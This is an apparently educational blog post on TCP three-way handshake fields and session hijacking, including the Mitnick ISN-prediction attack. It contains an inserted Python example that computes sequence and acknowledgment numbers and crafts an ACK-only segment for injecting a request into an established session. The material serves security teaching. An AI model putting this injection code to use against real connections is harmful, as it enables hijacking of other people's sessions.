Monday, April 9, 2012

Exploring TCP Three-Way Handshake Exploits



The Transport layer of the TCP/IP model is charged with carrying data between the Application layer and the network, using port numbers to deliver each segment to the right application. The Transport layer also uses acknowledgments to confirm that a segment reached its destination. Wireshark is a packet analyzer (its GUI is shown below) and is useful for exploring the three-way handshake used by the Transmission Control Protocol (TCP). The eight fields of the TCP section shown in Wireshark are: Source and Destination Ports, Sequence and Acknowledgment Numbers, Header Length, Flags, Window Size and Checksum. Of these, the Initial Sequence Number (ISN), the Source and Destination Ports and the Control Flags are the ones an attacker manipulates to perform attacks.

TCP Three-Way Handshake

Session hijacking is inserting yourself into a connection already established between a client and a server. Using the TCP session with www.webtycho.com as the example, an attacker would either have to be sniffing the traffic with Wireshark to capture the fields mentioned above, or use the blind technique of Kevin Mitnick's Christmas Day attack described below. Once the data is captured, the attacker crafts a packet that looks like the next packet in sequence after the last packet sent by the client. To do that, the attacker takes the last packet the client sent and adds the length of its TCP payload (the segment length, not the header's Data Offset field, which only gives the header length) to that packet's sequence number; a SYN or FIN flag consumes one extra sequence number. The result is the acknowledgment number the server will send back and the sequence number the crafted packet must carry (shown below).

The source port would be the client's (34235) and the destination would be the HTTP server's port 80. The client's sequence number stays the same as long as only the server is sending data, because only the client's own data advances it; likewise the acknowledgment number in the crafted packet keeps the client's last value if the server has sent nothing new. The crafted packet has only the ACK flag set to slip into the established session, and it must carry the correct sequence and acknowledgment values or the server will simply drop it. Because the legitimate client still holds the connection, its own sequence numbers then fall out of step with what the server expects, and the resulting burst of corrective ACKs (an "ACK storm") is one of the classic signs of this attack. Below is a Wireshark screen capture confirming the acknowledgment number projected in the calculation above.

How-to-Calculate Acknowledgement numbers
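The calculation and the crafted packet described above, as an added worked example (this is not code from the original post). It parses a TCP header from raw bytes, computes the next sequence number the server expects (payload length, plus one for SYN or FIN, with 32-bit wraparound, which goes slightly beyond the single case in the text), and builds the ACK-only segment an attacker would inject on the same port pair with a valid checksum. The IP addresses, sequence numbers and HTTP payload are constructed for the example; only the port pair (34235 to 80) and the host name come from the post.

```python
import socket
import struct

# Constructed sample values for the example; only the port pair 34235 -> 80
# and the host name are taken from the post above.
CLIENT_IP = "192.0.2.10"
SERVER_IP = "198.51.100.80"
SEQ_MASK = 0xFFFFFFFF

TCP_FLAG_FIN = 0x01
TCP_FLAG_SYN = 0x02
TCP_FLAG_PSH = 0x08
TCP_FLAG_ACK = 0x10


def parse_tcp(segment: bytes) -> dict:
    """Parse the 20-byte fixed TCP header and split off options and payload.
    The Data Offset field (header length in 32-bit words) only tells us where
    the payload starts; it is not what advances the sequence number."""
    if len(segment) < 20:
        raise ValueError("segment shorter than the minimum TCP header")
    sport, dport, seq, ack, off_flags, window, csum, urg = struct.unpack(
        "!HHIIHHHH", segment[:20])
    data_offset = (off_flags >> 12) * 4
    if data_offset < 20 or data_offset > len(segment):
        raise ValueError("bad data offset")
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": off_flags & 0x1FF, "window": window, "checksum": csum,
            "options": segment[20:data_offset], "payload": segment[data_offset:]}


def next_seq(pkt: dict) -> int:
    """Sequence number the receiver expects next, i.e. the acknowledgment
    number it will send back: last seq + payload length, plus one if the
    segment carried SYN or FIN (each consumes one sequence number)."""
    consumed = len(pkt["payload"])
    if pkt["flags"] & (TCP_FLAG_SYN | TCP_FLAG_FIN):
        consumed += 1
    return (pkt["seq"] + consumed) & SEQ_MASK


def tcp_checksum(src_ip: str, dst_ip: str, segment: bytes) -> int:
    """One's-complement checksum over the IPv4 pseudo-header and the segment."""
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(segment)))
    data = pseudo + segment
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def checksum_ok(src_ip: str, dst_ip: str, segment: bytes) -> bool:
    """A segment whose checksum field is correct sums to zero."""
    return tcp_checksum(src_ip, dst_ip, segment) == 0


def build_segment(sport, dport, seq, ack, flags, payload=b"", window=65535,
                  src_ip=CLIENT_IP, dst_ip=SERVER_IP) -> bytes:
    """Build a TCP segment with no options and a valid checksum."""
    header = struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                         (5 << 12) | flags, window, 0, 0)
    csum = tcp_checksum(src_ip, dst_ip, header + payload)
    header = header[:16] + struct.pack("!H", csum) + header[18:]
    return header + payload


def craft_hijack_segment(last_client_pkt: dict, payload: bytes) -> bytes:
    """The injected packet from the text: same port pair as the client, a
    sequence number continuing where the client's last segment ended, the
    client's last ack (the server has sent nothing new), and only ACK set."""
    return build_segment(last_client_pkt["sport"], last_client_pkt["dport"],
                         next_seq(last_client_pkt), last_client_pkt["ack"],
                         TCP_FLAG_ACK, payload)


# Constructed capture of the client's last request (42-byte payload).
SAMPLE_PAYLOAD = b"GET / HTTP/1.1\r\nHost: www.webtycho.com\r\n\r\n"
SAMPLE_CLIENT_SEGMENT = build_segment(34235, 80, 0x1A2B3C4D, 0x0000AB10,
                                      TCP_FLAG_ACK | TCP_FLAG_PSH, SAMPLE_PAYLOAD)


def demo():
    pkt = parse_tcp(SAMPLE_CLIENT_SEGMENT)
    injected = craft_hijack_segment(
        pkt, b"GET /admin HTTP/1.1\r\nHost: www.webtycho.com\r\n\r\n")
    return {"server_will_ack": next_seq(pkt), "injected": parse_tcp(injected)}


if __name__ == "__main__":
    result = demo()
    print("server's next ACK number: 0x%08X" % result["server_will_ack"])
    print("injected seq 0x%08X ack 0x%08X flags 0x%02X" % (
        result["injected"]["seq"], result["injected"]["ack"],
        result["injected"]["flags"]))
```

To check the arithmetic against a real capture, compare `next_seq()` of the client's last packet with the Acknowledgment Number in the server's next ACK in Wireshark; they must match, and if the server has meanwhile sent data the injected segment's ack field has to be raised to the end of that data as well.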

The famous Christmas Day attack of December 25, 1994, attributed to Kevin Mitnick, is an excellent example of session hijacking, done blind rather than by sniffing. The attacker went after computers belonging to Tsutomu Shimomura at the San Diego Supercomputer Center. The first step was reconnaissance with UNIX commands such as finger to learn which hosts trusted one another. The second step was to fill the connection queue of the trusted host, whose address would be spoofed, with half-open connections (a SYN flood), so that it could not answer the target's SYN/ACK with a reset. The third step was to probe the target with a few real connections, observe that its ISN grew by a constant amount with each new connection (128,000 in Shimomura's analysis), predict the ISN it would assign next, and then send a SYN spoofed from the trusted host followed by an ACK carrying the predicted ISN plus one, completing the handshake without ever seeing the SYN/ACK. This prediction is a different calculation from the payload-length arithmetic used above for an observed session: it only works when the target's ISN generator is predictable, which modern TCP stacks defeat by randomizing the ISN.
In conclusion, the TCP header contents are important for a security professional to know. The next sequence number, and therefore the acknowledgment number the server will return, can be calculated simply by adding the payload length to the sequence number of the last packet sent by the client; the ISN itself can only be predicted when the target generates it predictably. Once the three-way handshake is established, there are usually ACK flags back and forth until the connection is torn down by the four-way close (a FIN and an ACK in each direction). To hijack a session successfully you would use the source and destination ports already established together with the correct sequence and acknowledgment values.
